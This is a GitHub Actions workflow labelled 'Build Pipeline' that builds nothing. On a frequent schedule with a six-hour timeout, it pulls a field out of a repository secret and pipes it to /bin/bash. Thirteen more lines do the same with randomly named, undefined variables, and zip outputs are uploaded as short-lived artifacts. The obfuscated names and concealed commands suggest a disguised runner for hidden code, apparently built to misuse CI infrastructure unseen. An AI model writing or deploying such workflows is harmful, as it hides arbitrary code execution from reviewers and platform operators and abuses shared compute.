name: Build Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '3 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Start
        env:
          ayx4: ${{ secrets.ayx4 }}
        run: |
          printf '%s' "$ayx4" | jq -r .zglis766 | /bin/bash
          printf '%s' "$hhgj0" | jq -r .unk972 | /bin/bash
          echo $xd3652 | jq -r .krfgg99220 | /bin/bash
          echo $gftq53282 | jq -r .blc2255 | /bin/bash
          printf '%s' "$lydap28" | jq -r .wgd84328 | /bin/bash
          echo $pxjg23117 | jq -r .gxd97490 | /bin/bash
          printf '%s' "$vxtn56" | jq -r .fywqf6983 | /bin/bash
          echo $yyqx72 | jq -r .iimax32526 | /bin/bash
          echo $fstl3 | jq -r .o42 | /bin/bash
          echo $c14201 | jq -r .klrf909 | /bin/bash
          echo $k8 | jq -r .n68 | /bin/bash
          echo $pyo1574 | jq -r .qmvb25098 | /bin/bash
          echo $b45047 | jq -r .mjuv75 | /bin/bash
          echo $lnlun287 | jq -r .emyxx56 | /bin/bash

      - name: Save output
        uses: actions/upload-artifact@v4
        with:
          name: BnQagHLi
          path: "*.zip"
          retention-days: 1
